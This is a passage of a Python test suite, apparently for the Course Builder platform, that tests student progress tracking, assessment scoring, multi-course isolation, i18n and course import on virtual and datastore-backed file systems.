                lesson_id, response.body)
            # Navigate to the course overview page and check that the unit shows
            # partial progress.
            response = self.get('course')
            assert_equals(response.status_int, 200)
            assert_contains(
                u'id="progress-inprogress-%s"' % unit_id, response.body)
        finally:
            namespace_manager.set_namespace(old_namespace)
    def test_progress(self):
        """Test student activity progress in detail, using the sample course.

        Progress status values observed below: 0 = not started,
        1 = in progress, 2 = completed.
        """
        # Minimal stand-in for a request handler: the Course constructor
        # only needs an object exposing .app_context.
        class FakeHandler(object):
            def __init__(self, app_context):
                self.app_context = app_context
        course = Course(FakeHandler(sites.get_all_courses()[0]))
        tracker = course.get_progress_tracker()
        student = models.Student(key_name='key-test-student')
        # Initially, all progress entries should be set to zero.
        unit_progress = tracker.get_unit_progress(student)
        for key in unit_progress:
            assert unit_progress[key] == 0
        lesson_progress = tracker.get_lesson_progress(student, 1)
        for key in lesson_progress:
            assert lesson_progress[key] == {'html': 0, 'activity': 0}
        # The blocks in Lesson 1.2 with activities are blocks 3 and 6.
        # Submitting block 3 should trigger an in-progress update.
        tracker.put_block_completed(student, 1, 2, 3)
        assert tracker.get_unit_progress(student)['1'] == 1
        assert tracker.get_lesson_progress(student, 1)[2] == {
            'html': 0, 'activity': 1
        }
        # Submitting block 6 should trigger a completion update for the
        # activity, but Lesson 1.2 is still incomplete.
        tracker.put_block_completed(student, 1, 2, 6)
        assert tracker.get_unit_progress(student)['1'] == 1
        assert tracker.get_lesson_progress(student, 1)[2] == {
            'html': 0, 'activity': 2
        }
        # Visiting the HTML page for Lesson 1.2 completes the lesson.
        tracker.put_html_accessed(student, 1, 2)
        assert tracker.get_unit_progress(student)['1'] == 1
        assert tracker.get_lesson_progress(student, 1)[2] == {
            'html': 2, 'activity': 2
        }
        # Test a lesson with no interactive blocks in its activity. It should
        # change its status to 'completed' once it is accessed.
        tracker.put_activity_accessed(student, 2, 1)
        assert tracker.get_unit_progress(student)['2'] == 1
        assert tracker.get_lesson_progress(student, 2)[1] == {
            'html': 0, 'activity': 2
        }
        # Test that a lesson without activities (Lesson 1.1) doesn't count.
        # Complete lessons 1.3, 1.4, 1.5 and 1.6; unit 1 should then be marked
        # as 'completed' even though we have no events associated with
        # Lesson 1.1.
        tracker.put_html_accessed(student, 1, 1)
        tracker.put_html_accessed(student, 1, 3)
        tracker.put_html_accessed(student, 1, 4)
        tracker.put_html_accessed(student, 1, 5)
        tracker.put_html_accessed(student, 1, 6)
        tracker.put_activity_completed(student, 1, 3)
        tracker.put_activity_completed(student, 1, 4)
        tracker.put_activity_completed(student, 1, 5)
        assert tracker.get_unit_progress(student)['1'] == 1
        tracker.put_activity_completed(student, 1, 6)
        assert tracker.get_unit_progress(student)['1'] == 2
        # Test that a unit is not completed until all HTML and activity pages
        # have been, at least, visited. Unit 6 has 3 lessons; the last one has
        # no activity block.
        tracker.put_html_accessed(student, 6, 1)
        tracker.put_html_accessed(student, 6, 2)
        tracker.put_activity_completed(student, 6, 1)
        tracker.put_activity_completed(student, 6, 2)
        assert tracker.get_unit_progress(student)['6'] == 1
        tracker.put_activity_accessed(student, 6, 3)
        assert tracker.get_unit_progress(student)['6'] == 1
        tracker.put_html_accessed(student, 6, 3)
        assert tracker.get_unit_progress(student)['6'] == 2
        # Test assessment counters: status increments on each completion.
        pre_id = 'Pre'
        tracker.put_assessment_completed(student, pre_id)
        progress = tracker.get_or_create_progress(student)
        assert tracker.is_assessment_completed(progress, pre_id)
        assert tracker.get_assessment_status(progress, pre_id) == 1
        tracker.put_assessment_completed(student, pre_id)
        progress = tracker.get_or_create_progress(student)
        assert tracker.is_assessment_completed(progress, pre_id)
        assert tracker.get_assessment_status(progress, pre_id) == 2
        tracker.put_assessment_completed(student, pre_id)
        progress = tracker.get_or_create_progress(student)
        assert tracker.is_assessment_completed(progress, pre_id)
        assert tracker.get_assessment_status(progress, pre_id) == 3
        # Test that invalid keys do not lead to any updates.
        # Invalid assessment id.
        fake_id = 'asdf'
        tracker.put_assessment_completed(student, fake_id)
        progress = tracker.get_or_create_progress(student)
        assert not tracker.is_assessment_completed(progress, fake_id)
        assert tracker.get_assessment_status(progress, fake_id) is None
        # Invalid unit id.
        tracker.put_activity_completed(student, fake_id, 1)
        progress = tracker.get_or_create_progress(student)
        assert tracker.get_activity_status(progress, fake_id, 1) is None
        # Invalid lesson id.
        fake_numeric_id = 22
        tracker.put_activity_completed(student, 1, fake_numeric_id)
        progress = tracker.get_or_create_progress(student)
        assert tracker.get_activity_status(progress, 1, fake_numeric_id) is None
        # Invalid block id.
        tracker.put_block_completed(student, 5, 2, fake_numeric_id)
        progress = tracker.get_or_create_progress(student)
        assert not tracker.is_block_completed(
            progress, 5, 2, fake_numeric_id)
class AssessmentTest(actions.TestBase):
    """Test for assessments."""
    def test_course_pass(self):
        """Test student passing final exam."""
        email = 'test_pass@google.com'
        name = 'Test Pass'
        post = {'assessment_type': 'Fin', 'score': '100.00'}
        # Register.
        actions.login(email)
        actions.register(self, name)
        # Submit answer.
        response = actions.submit_assessment(self, 'Fin', post)
        assert_equals(response.status_int, 200)
        # A 100% final with the sample weighting yields a 70% overall score.
        assert_contains('your overall course score of 70%', response.body)
        assert_contains('you have passed the course', response.body)
        # Check that the result shows up on the profile page.
        response = actions.check_profile(self, name)
        assert_contains('70', response.body)
        assert_contains('100', response.body)
    def test_assessments(self):
        """Test assessment scores are properly submitted and summarized."""
        course = courses.Course(None, app_context=sites.get_all_courses()[0])
        email = 'test_assessments@google.com'
        name = 'Test Assessments'
        pre_answers = [{'foo': 'bar'}, {'Alice': u'Bob (тест данные)'}]
        pre = {
            'assessment_type': 'Pre', 'score': '1.00',
            'answers': transforms.dumps(pre_answers)}
        mid = {'assessment_type': 'Mid', 'score': '2.00'}
        fin = {'assessment_type': 'Fin', 'score': '3.00'}
        peer = {'assessment_type': 'ReviewAssessmentExample'}
        # Used to check that a lower re-submission does not lower the score
        # while a higher one raises it.
        second_mid = {'assessment_type': 'Mid', 'score': '1.00'}
        second_fin = {'assessment_type': 'Fin', 'score': '100000'}
        # Register.
        actions.login(email)
        actions.register(self, name)
        # Navigate to the course overview page.
        response = self.get('course')
        assert_equals(response.status_int, 200)
        assert_does_not_contain(u'id="progress-completed-Mid', response.body)
        assert_contains(u'id="progress-notstarted-Mid', response.body)
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(self.namespace)
        try:
            student = models.Student.get_enrolled_student_by_email(email)
            # Check that four score objects (corresponding to the four sample
            # assessments) exist right now, and that they all have zero
            # score.
            student_scores = course.get_all_scores(student)
            assert len(student_scores) == 4
            for assessment in student_scores:
                assert assessment['score'] == 0
            # Submit assessments and check that the score is updated.
            actions.submit_assessment(self, 'Pre', pre)
            student = models.Student.get_enrolled_student_by_email(email)
            student_scores = course.get_all_scores(student)
            assert len(student_scores) == 4
            for assessment in student_scores:
                if assessment['id'] == 'Pre':
                    assert assessment['score'] > 0
                else:
                    assert assessment['score'] == 0
            actions.submit_assessment(self, 'Mid', mid)
            student = models.Student.get_enrolled_student_by_email(email)
            # Navigate to the course overview page.
            response = self.get('course')
            assert_equals(response.status_int, 200)
            assert_contains(u'id="progress-completed-Pre', response.body)
            assert_contains(u'id="progress-completed-Mid', response.body)
            assert_contains(u'id="progress-notstarted-Fin', response.body)
            # Submit the final assessment.
            actions.submit_assessment(self, 'Fin', fin)
            student = models.Student.get_enrolled_student_by_email(email)
            # Submit the sample peer review assessment.
            actions.submit_assessment(self, 'ReviewAssessmentExample', peer)
            student_scores = course.get_all_scores(student)
            # This assessment is not considered to be completed until enough
            # peer reviews have been submitted.
            for assessment in student_scores:
                if assessment['id'] == 'ReviewAssessmentExample':
                    assert assessment['human_graded']
                    assert not assessment['completed']
            # Navigate to the course overview page.
            response = self.get('course')
            assert_equals(response.status_int, 200)
            assert_contains(u'id="progress-completed-Fin', response.body)
            # Check that the overall-score is non-zero.
            assert course.get_overall_score(student)
            # Check assessment answers.
            answers = transforms.loads(
                models.StudentAnswersEntity.get_by_key_name(
                    student.user_id).data)
            assert pre_answers == answers['Pre']
            # pylint: disable-msg=g-explicit-bool-comparison
            assert [] == answers['Mid']
            assert [] == answers['Fin']
            # pylint: enable-msg=g-explicit-bool-comparison
            # Check that scores are recorded properly. Overall score uses the
            # sample course weighting: 30% midterm + 70% final.
            student = models.Student.get_enrolled_student_by_email(email)
            assert int(course.get_score(student, 'Pre')) == 1
            assert int(course.get_score(student, 'Mid')) == 2
            assert int(course.get_score(student, 'Fin')) == 3
            assert (int(course.get_overall_score(student)) ==
                    int((0.30 * 2) + (0.70 * 3)))
            # Try posting a new midcourse exam with a lower score;
            # nothing should change.
            actions.submit_assessment(self, 'Mid', second_mid)
            student = models.Student.get_enrolled_student_by_email(email)
            assert int(course.get_score(student, 'Pre')) == 1
            assert int(course.get_score(student, 'Mid')) == 2
            assert int(course.get_score(student, 'Fin')) == 3
            assert (int(course.get_overall_score(student)) ==
                    int((0.30 * 2) + (0.70 * 3)))
            # Now try posting a postcourse exam with a higher score and note
            # the changes.
            actions.submit_assessment(self, 'Fin', second_fin)
            student = models.Student.get_enrolled_student_by_email(email)
            assert int(course.get_score(student, 'Pre')) == 1
            assert int(course.get_score(student, 'Mid')) == 2
            assert int(course.get_score(student, 'Fin')) == 100000
            assert (int(course.get_overall_score(student)) ==
                    int((0.30 * 2) + (0.70 * 100000)))
        finally:
            namespace_manager.set_namespace(old_namespace)
def remove_dir(dir_name):
    """Recursively delete dir_name; raise if the deletion did not stick."""
    logging.info('removing folder: %s', dir_name)
    if not os.path.exists(dir_name):
        # Nothing to remove; treat as a successful no-op.
        return
    shutil.rmtree(dir_name)
    if os.path.exists(dir_name):
        raise Exception('Failed to delete directory: %s' % dir_name)
def clean_dir(dir_name):
    """Reset dir_name to an empty directory, recreating it from scratch."""
    # Drop whatever currently exists, then build a fresh empty tree.
    remove_dir(dir_name)
    logging.info('creating folder: %s', dir_name)
    os.makedirs(dir_name)
    created = os.path.exists(dir_name)
    if not created:
        raise Exception('Failed to create directory: %s' % dir_name)
def clone_canonical_course_data(src, dst):
    """Makes a writable copy of canonical course content under dst."""
    clean_dir(dst)
    # Copy the three content trees verbatim, in the canonical order.
    for subtree in ('assets', 'data', 'views'):
        shutil.copytree(
            os.path.join(src, subtree),
            os.path.join(dst, subtree))
    shutil.copy(
        os.path.join(src, 'course.yaml'),
        os.path.join(dst, 'course.yaml'))
    # Make all files writable.
    for root, unused_dirs, names in os.walk(dst):
        for name in names:
            os.chmod(os.path.join(root, name), 0o777)
class GeneratedCourse(object):
    """Describes one dynamically generated course and its derived names.

    Every attribute is derived from the short path suffix given at
    construction time, so each instance yields a unique namespace, title,
    data directory, and student identity.
    """
    @classmethod
    def set_data_home(cls, test):
        """All data for this test will be placed here."""
        cls.data_home = test.test_tempdir
    def __init__(self, ns):
        # Short suffix that makes every derived value unique.
        self.path = ns
    @property
    def namespace(self):
        return 'ns{0}'.format(self.path)
    @property
    def title(self):
        return u'Power Searching with Google title-{0} (тест данные)'.format(
            self.path)
    @property
    def unit_title(self):
        return u'Interpreting results unit-title-{0} (тест данные)'.format(
            self.path)
    @property
    def lesson_title(self):
        return u'Word order matters lesson-title-{0} (тест данные)'.format(
            self.path)
    @property
    def head(self):
        return '<!-- head-{0} -->'.format(self.path)
    @property
    def css(self):
        return '<!-- css-{0} -->'.format(self.path)
    @property
    def home(self):
        return os.path.join(self.data_home, 'data-{0}'.format(self.path))
    @property
    def email(self):
        return 'walk_the_course_named_{0}@google.com'.format(self.path)
    @property
    def name(self):
        return 'Walk The Course Named {0}'.format(self.path)
class MultipleCoursesTestBase(actions.TestBase):
    """Configures several courses for running concurrently.

    setUp clones the canonical sample course three times (a, b, ru) under a
    temporary BUNDLE_ROOT, mutates each clone so its content is unique, and
    registers all three with the sites router; tearDown restores everything.
    """
    def modify_file(self, filename, find, replace):
        """Read, modify and write back the file."""
        text = open(filename, 'r').read().decode('utf-8')
        # Make sure target text is not in the file.
        assert replace not in text
        text = text.replace(find, replace)
        assert replace in text
        open(filename, 'w').write(text.encode('utf-8'))
    def modify_canonical_course_data(self, course):
        """Modify canonical content by adding unique bits to it."""
        self.modify_file(
            os.path.join(course.home, 'course.yaml'),
            'title: \'Power Searching with Google\'',
            'title: \'%s\'' % course.title)
        self.modify_file(
            os.path.join(course.home, 'data/unit.csv'),
            ',Interpreting results,',
            ',%s,' % course.unit_title)
        self.modify_file(
            os.path.join(course.home, 'data/lesson.csv'),
            ',Word order matters,',
            ',%s,' % course.lesson_title)
        # The unit title also appears in lesson.csv; keep both in sync.
        self.modify_file(
            os.path.join(course.home, 'data/lesson.csv'),
            ',Interpreting results,',
            ',%s,' % course.unit_title)
        # Unique markers in the base template and CSS let tests verify that
        # each course serves its own views and assets.
        self.modify_file(
            os.path.join(course.home, 'views/base.html'),
            '<head>',
            '<head>\n%s' % course.head)
        self.modify_file(
            os.path.join(course.home, 'assets/css/main.css'),
            'html {',
            '%s\nhtml {' % course.css)
    def prepare_course_data(self, course):
        """Create unique course content for a course."""
        clone_canonical_course_data(self.bundle_root, course.home)
        self.modify_canonical_course_data(course)
    def setUp(self):  # pylint: disable-msg=g-bad-name
        """Configure the test."""
        super(MultipleCoursesTestBase, self).setUp()
        GeneratedCourse.set_data_home(self)
        self.course_a = GeneratedCourse('a')
        self.course_b = GeneratedCourse('b')
        self.course_ru = GeneratedCourse('ru')
        # Override BUNDLE_ROOT; original saved for restoration in tearDown.
        self.bundle_root = appengine_config.BUNDLE_ROOT
        appengine_config.BUNDLE_ROOT = GeneratedCourse.data_home
        # Prepare course content.
        clean_dir(GeneratedCourse.data_home)
        self.prepare_course_data(self.course_a)
        self.prepare_course_data(self.course_b)
        self.prepare_course_data(self.course_ru)
        # Setup one course for I18N.
        self.modify_file(
            os.path.join(self.course_ru.home, 'course.yaml'),
            'locale: \'en_US\'',
            'locale: \'no_NO\'')
        # Configure courses.
        sites.setup_courses('%s, %s, %s' % (
            'course:/courses/a:/data-a:nsa',
            'course:/courses/b:/data-b:nsb',
            'course:/courses/ru:/data-ru:nsru'))
    def tearDown(self):  # pylint: disable-msg=g-bad-name
        """Clean up."""
        sites.reset_courses()
        appengine_config.BUNDLE_ROOT = self.bundle_root
        super(MultipleCoursesTestBase, self).tearDown()
    def walk_the_course(
            self, course, first_time=True, is_admin=False, logout=True):
        """Visit a course as a Student would.

        Checks the preview/course page, a static asset, registration (first
        visit only), and one lesson and activity page, asserting each carries
        this course's unique title/head/css markers.
        """
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['browsable'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        # Check normal user has no access.
        actions.login(course.email, is_admin=is_admin)
        # Test schedule.
        if first_time:
            response = self.testapp.get('/courses/%s/preview' % course.path)
        else:
            response = self.testapp.get('/courses/%s/course' % course.path)
        assert_contains(course.title, response.body)
        assert_contains(course.unit_title, response.body)
        assert_contains(course.head, response.body)
        # Tests static resource.
        response = self.testapp.get(
            '/courses/%s/assets/css/main.css' % course.path)
        assert_contains(course.css, response.body)
        if first_time:
            # Test registration.
            response = self.get('/courses/%s/register' % course.path)
            assert_contains(course.title, response.body)
            assert_contains(course.head, response.body)
            register_form = actions.get_form_by_action(response, 'register')
            register_form.set('form01', course.name)
            register_form.action = '/courses/%s/register' % course.path
            response = self.submit(register_form)
            assert_equals(response.status_int, 302)
            assert_contains(
                'course#registration_confirmation', response.headers[
                    'location'])
        # Check lesson page.
        response = self.testapp.get(
            '/courses/%s/unit?unit=1&lesson=5' % course.path)
        assert_contains(course.title, response.body)
        assert_contains(course.lesson_title, response.body)
        assert_contains(course.head, response.body)
        # Check activity page.
        response = self.testapp.get(
            '/courses/%s/activity?unit=1&lesson=5' % course.path)
        assert_contains(course.title, response.body)
        assert_contains(course.lesson_title, response.body)
        assert_contains(course.head, response.body)
        if logout:
            actions.logout()
        # Clean up.
        sites.ApplicationContext.get_environ = get_environ_old
class MultipleCoursesTest(MultipleCoursesTestBase):
    """Test several courses running concurrently."""
    def test_courses_are_isolated(self):
        """Test each course serves its own assets, views and data."""
        # Pretend students visit courses.
        self.walk_the_course(self.course_a)
        self.walk_the_course(self.course_b)
        self.walk_the_course(self.course_a, first_time=False)
        self.walk_the_course(self.course_b, first_time=False)
        # Check course namespaced data.
        self.validate_course_data(self.course_a)
        self.validate_course_data(self.course_b)
        # Check default namespace.
        # No Student records may leak into the default namespace.
        assert (
            namespace_manager.get_namespace() ==
            appengine_config.DEFAULT_NAMESPACE_NAME)
        assert not models.Student.all().fetch(1000)
    def validate_course_data(self, course):
        """Check the course's namespace holds exactly its own student."""
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(course.namespace)
        try:
            students = models.Student.all().fetch(1000)
            assert len(students) == 1
            for student in students:
                assert_equals(course.email, student.key().name())
                assert_equals(course.name, student.name)
        finally:
            # Always restore the caller's namespace.
            namespace_manager.set_namespace(old_namespace)
class I18NTest(MultipleCoursesTestBase):
    """Test courses running in different locales and containing I18N content."""
    def test_csv_supports_utf8(self):
        """Test UTF-8 content in CSV file is handled correctly."""
        title_ru = u'Найди факты быстрее'
        csv_file = os.path.join(self.course_ru.home, 'data/unit.csv')
        # Replace the English title with a Russian one in both CSV files.
        self.modify_file(
            csv_file, ',Find facts faster,', ',%s,' % title_ru)
        self.modify_file(
            os.path.join(self.course_ru.home, 'data/lesson.csv'),
            ',Find facts faster,', ',%s,' % title_ru)
        rows = []
        for row in csv.reader(open(csv_file)):
            rows.append(row)
        # The raw CSV bytes must decode back to the original unicode title.
        assert title_ru == rows[6][3].decode('utf-8')
        response = self.get('/courses/%s/course' % self.course_ru.path)
        assert_contains(title_ru, response.body)
        # Tests student perspective.
        self.walk_the_course(self.course_ru, first_time=True)
        self.walk_the_course(self.course_ru, first_time=False)
        # Test course author dashboard.
        self.walk_the_course(
            self.course_ru, first_time=False, is_admin=True, logout=False)
        def assert_page_contains(page_name, text_array):
            # Fetch a dashboard sub-page and assert all texts appear on it.
            dashboard_url = '/courses/%s/dashboard' % self.course_ru.path
            response = self.get('%s?action=%s' % (dashboard_url, page_name))
            for text in text_array:
                assert_contains(text, response.body)
        assert_page_contains('', [
            title_ru, self.course_ru.unit_title, self.course_ru.lesson_title])
        assert_page_contains(
            'assets', [self.course_ru.title])
        assert_page_contains(
            'settings', [
                self.course_ru.title,
                vfs.AbstractFileSystem.normpath(self.course_ru.home)])
        # Clean up.
        actions.logout()
    def test_i18n(self):
        """Test course is properly internationalized."""
        # The 'ru' course was switched to a non-English locale in setUp;
        # the course page must render localized navigation strings.
        response = self.get('/courses/%s/course' % self.course_ru.path)
        assert_contains_all_of(
            [u'Войти', u'Расписание', u'Курс'], response.body)
class CourseUrlRewritingTestBase(actions.TestBase):
    """Prepare course for using rewrite rules and '/courses/pswg' base URL."""
    def setUp(self):  # pylint: disable-msg=g-bad-name
        super(CourseUrlRewritingTestBase, self).setUp()
        self.base = '/courses/pswg'
        self.namespace = 'gcb-courses-pswg-tests-ns'
        sites.setup_courses('course:%s:/:%s' % (self.base, self.namespace))
    def tearDown(self):  # pylint: disable-msg=g-bad-name
        sites.reset_courses()
        super(CourseUrlRewritingTestBase, self).tearDown()
    def canonicalize(self, href, response=None):
        """Canonicalize URL's using either <base> or self.base."""
        already_canonical = href.startswith(
            self.base) or utils.ApplicationHandler.is_absolute(href)
        if not already_canonical:
            if response:
                # A response was given: defer to its <base> tag to compute
                # the canonical URL.
                return super(CourseUrlRewritingTestBase, self).canonicalize(
                    href, response)
            # Otherwise prepend self.base to compute the canonical URL.
            if not href.startswith('/'):
                href = '/%s' % href
            href = '%s%s' % (self.base, href)
        self.audit_url(href)
        return href
class VirtualFileSystemTestBase(actions.TestBase):
    """Prepares a course running on a virtual local file system."""
    def setUp(self): # pylint: disable-msg=g-bad-name
        """Configure the test.

        Clones the canonical course into 'data-v' under the generated data
        home, mounts a course at '/' whose folder is '/data-vfs', and
        installs an after_create hook that maps that folder onto the
        read-only local filesystem rooted at 'data-v'.
        """
        super(VirtualFileSystemTestBase, self).setUp()
        GeneratedCourse.set_data_home(self)
        # Override BUNDLE_ROOT.
        # Saved so tearDown can restore it.
        self.bundle_root = appengine_config.BUNDLE_ROOT
        appengine_config.BUNDLE_ROOT = GeneratedCourse.data_home
        # Prepare course content.
        home_folder = os.path.join(GeneratedCourse.data_home, 'data-v')
        clone_canonical_course_data(self.bundle_root, home_folder)
        # Configure course.
        self.namespace = 'nsv'
        sites.setup_courses('course:/:/data-vfs:%s' % self.namespace)
        # Modify app_context filesystem to map /data-v to /data-vfs.
        def after_create(unused_cls, instance):
            # pylint: disable-msg=protected-access
            instance._fs = vfs.AbstractFileSystem(
                vfs.LocalReadOnlyFileSystem(
                    os.path.join(GeneratedCourse.data_home, 'data-vfs'),
                    home_folder))
        # NOTE(review): this hook is never removed in tearDown; it appears
        # to persist for later ApplicationContext creations — confirm.
        sites.ApplicationContext.after_create = after_create
    def tearDown(self): # pylint: disable-msg=g-bad-name
        """Clean up: unregister courses and restore BUNDLE_ROOT."""
        sites.reset_courses()
        appengine_config.BUNDLE_ROOT = self.bundle_root
        super(VirtualFileSystemTestBase, self).tearDown()
class DatastoreBackedCourseTest(actions.TestBase):
    """Prepares an empty course running on datastore-backed file system."""
    def setUp(self): # pylint: disable-msg=g-bad-name
        """Configure the test: one course mounted at '/' in namespace 'dsbfs'."""
        super(DatastoreBackedCourseTest, self).setUp()
        self.supports_editing = True
        self.namespace = 'dsbfs'
        sites.setup_courses('course:/::%s' % self.namespace)
        all_courses = sites.get_all_courses()
        assert len(all_courses) == 1
        self.app_context = all_courses[0]
    def tearDown(self): # pylint: disable-msg=g-bad-name
        """Clean up."""
        sites.reset_courses()
        super(DatastoreBackedCourseTest, self).tearDown()
    def upload_all_in_dir(self, dir_name, files_added):
        """Uploads all files in a folder to vfs.

        Args:
            dir_name: folder name relative to BUNDLE_ROOT to walk.
            files_added: list; names of uploaded files are appended to it.
        """
        root_dir = os.path.join(appengine_config.BUNDLE_ROOT, dir_name)
        for root, unused_dirs, files in os.walk(root_dir):
            for afile in files:
                filename = os.path.join(root, afile)
                # Close each handle after put(); the original code leaked
                # one open file handle per uploaded file.
                # Assumes fs.put() consumes the stream before returning —
                # TODO confirm against the vfs implementation.
                with open(filename, 'rb') as stream:
                    self.app_context.fs.put(filename, stream)
                files_added.append(filename)
    def init_course_data(self, upload_files):
        """Uploads required course data files into vfs.

        Args:
            upload_files: callable taking a list; it uploads files and
                appends their names to the list.
        """
        files_added = []
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace(self.namespace)
            upload_files(files_added)
            # Normalize paths to be identical for Windows and Linux.
            files_added_normpath = []
            for file_added in files_added:
                files_added_normpath.append(
                    vfs.AbstractFileSystem.normpath(file_added))
            # Everything uploaded must be listed back by the vfs.
            assert self.app_context.fs.list(
                appengine_config.BUNDLE_ROOT) == sorted(files_added_normpath)
        finally:
            namespace_manager.set_namespace(old_namespace)
    def upload_all_sample_course_files(self, files_added):
        """Uploads all sample course data files into vfs."""
        self.upload_all_in_dir('assets', files_added)
        self.upload_all_in_dir('views', files_added)
        self.upload_all_in_dir('data', files_added)
        course_yaml = os.path.join(
            appengine_config.BUNDLE_ROOT, 'course.yaml')
        # Use a context manager so the course.yaml handle is closed.
        with open(course_yaml, 'rb') as stream:
            self.app_context.fs.put(course_yaml, stream)
        files_added.append(course_yaml)
class DatastoreBackedCustomCourseTest(DatastoreBackedCourseTest):
    """Prepares a sample course running on datastore-backed file system."""
    def test_course_import(self):
        """Test importing of the course."""
        # Setup courses.
        # Destination: empty 1.3 course at /test; source: 1.2 course at /.
        sites.setup_courses('course:/test::ns_test, course:/:/')
        self.namespace = 'ns_test'
        self.base = '/test'
        config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
        # Format import payload and URL.
        payload_dict = {}
        payload_dict['course'] = 'course:/:/'
        request = {}
        request['payload'] = transforms.dumps(payload_dict)
        import_put_url = (
            'rest/course/import?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}))
        # Check non-logged user has no rights.
        response = self.put(import_put_url, {}, expect_errors=True)
        assert_equals(404, response.status_int)
        # Login as admin.
        email = 'test_course_import@google.com'
        name = 'Test Course Import'
        actions.login(email, is_admin=True)
        # Check course is empty.
        response = self.get('dashboard')
        assert_equals(200, response.status_int)
        assert_does_not_contain('Filter image results by color', response.body)
        # Import sample course.
        # Rebuild the URL with an XSRF token now that we are logged in.
        request[
            'xsrf_token'] = XsrfTokenManager.create_xsrf_token('import-course')
        import_put_url = (
            'rest/course/import?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}))
        response = self.put(import_put_url, {})
        assert_equals(200, response.status_int)
        assert_contains('Imported.', response.body)
        # Check course is not empty.
        response = self.get('dashboard')
        assert_contains('Filter image results by color', response.body)
        # Check assessment is copied.
        response = self.get('assets/js/assessment-21.js')
        assert_equals(200, response.status_int)
        assert_contains('Humane Society website', response.body)
        # Check activity is copied.
        response = self.get('assets/js/activity-37.js')
        assert_equals(200, response.status_int)
        assert_contains('explore ways to keep yourself updated', response.body)
        unit_2_title = 'Unit 2 - Interpreting results'
        lesson_2_1_title = '2.1 When search results suggest something new'
        lesson_2_2_title = '2.2 Thinking more deeply about your search'
        # Check units and lessons are indexed correctly.
        response = actions.register(self, name)
        assert (
            'http://localhost'
            '/test/course'
            '#registration_confirmation' == response.location)
        response = self.get('course')
        assert_contains(unit_2_title, response.body)
        # Unit page.
        response = self.get('unit?unit=9')
        assert_contains( # A unit title.
            unit_2_title, response.body)
        assert_contains( # First child lesson without link.
            lesson_2_1_title, response.body)
        assert_contains( # Second child lesson with link.
            lesson_2_2_title, response.body)
        assert_contains_all_of( # Breadcrumbs.
            ['Unit 2</a></li>', 'Lesson 1</li>'], response.body)
        # Activity page.
        response = self.get('activity?unit=9&lesson=10')
        assert_contains( # A unit title.
            unit_2_title, response.body)
        assert_contains( # An activity title.
            'Lesson 2.1 Activity', response.body)
        assert_contains( # First child lesson without link.
            lesson_2_1_title, response.body)
        assert_contains( # Second child lesson with link.
            lesson_2_2_title, response.body)
        assert_contains_all_of( # Breadcrumbs.
            ['Unit 2</a></li>', 'Lesson 1</a></li>'], response.body)
        # Clean up.
        sites.reset_courses()
        config.Registry.test_overrides = {}
    def test_get_put_file(self):
        """Test that one can put/get file via REST interface."""
        self.init_course_data(self.upload_all_sample_course_files)
        email = 'test_get_put_file@google.com'
        actions.login(email, is_admin=True)
        response = self.get('dashboard?action=settings')
        # Check course.yaml edit form.
        compute_form = response.forms['edit_course_yaml']
        response = self.submit(compute_form)
        assert_equals(response.status_int, 302)
        assert_contains(
            'dashboard?action=edit_settings&key=%2Fcourse.yaml',
            response.location)
        response = self.get(response.location)
        assert_contains('rest/files/item?key=%2Fcourse.yaml', response.body)
        # Get text file.
        response = self.get('rest/files/item?key=%2Fcourse.yaml')
        assert_equals(response.status_int, 200)
        # The REST payload is JSON-in-JSON: the outer envelope carries a
        # serialized 'payload' string.
        json_dict = transforms.loads(
            transforms.loads(response.body)['payload'])
        assert '/course.yaml' == json_dict['key']
        assert 'text/utf-8' == json_dict['encoding']
        assert (open(os.path.join(
            appengine_config.BUNDLE_ROOT, 'course.yaml')).read(
                ) == json_dict['content'])
    def test_empty_course(self):
        """Test course with no assets and the simplest possible course.yaml."""
        email = 'test_empty_course@google.com'
        actions.login(email, is_admin=True)
        # Check minimal course page comes up.
        response = self.get('course')
        assert_contains('UNTITLED COURSE', response.body)
        assert_contains('Registration', response.body)
        # Check inheritable files are accessible.
        response = self.get('/assets/css/main.css')
        assert (open(os.path.join(
            appengine_config.BUNDLE_ROOT, 'assets/css/main.css')).read(
                ) == response.body)
        # Check non-inheritable files are not inherited.
        response = self.testapp.get(
            '/assets/js/activity-1.3.js', expect_errors=True)
        assert_equals(response.status_int, 404)
        # Login as admin.
        email = 'test_empty_course@google.com'
        actions.login(email, is_admin=True)
        response = self.get('dashboard')
        # Add unit.
        compute_form = response.forms['add_unit']
        response = self.submit(compute_form)
        response = self.get('/rest/course/unit?key=1')
        assert_equals(response.status_int, 200)
        # Add lessons.
        response = self.get('dashboard')
        compute_form = response.forms['add_lesson']
        response = self.submit(compute_form)
        response = self.get('/rest/course/lesson?key=2')
        assert_equals(response.status_int, 200)
        # Add assessment.
        response = self.get('dashboard')
        compute_form = response.forms['add_assessment']
        response = self.submit(compute_form)
        response = self.get('/rest/course/assessment?key=3')
        assert_equals(response.status_int, 200)
        # Add link.
        response = self.get('dashboard')
        compute_form = response.forms['add_link']
        response = self.submit(compute_form)
        response = self.get('/rest/course/link?key=4')
        assert_equals(response.status_int, 200)
    def import_sample_course(self):
        """Imports a sample course."""
        # Setup courses.
        sites.setup_courses('course:/test::ns_test, course:/:/')
        # Import sample course.
        # Course [0] (/test) is the destination, course [1] (/) the source.
        dst_app_context = sites.get_all_courses()[0]
        src_app_context = sites.get_all_courses()[1]
        dst_course = courses.Course(None, app_context=dst_app_context)
        errors = []
        src_course_out, dst_course_out = dst_course.import_from(
            src_app_context, errors)
        if errors:
            raise Exception(errors)
        assert len(
            src_course_out.get_units()) == len(dst_course_out.get_units())
        dst_course_out.save()
        # Clean up.
        sites.reset_courses()
    def test_imported_course_performance(self):
        """Tests various pages of the imported course."""
        self.import_sample_course()
        # Install a clone on the '/' so all the tests will treat it as normal
        # sample course.
        sites.setup_courses('course:/::ns_test')
        self.namespace = 'ns_test'
        # Enable memcache.
        config.Registry.test_overrides[
            models.CAN_USE_MEMCACHE.name] = True
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
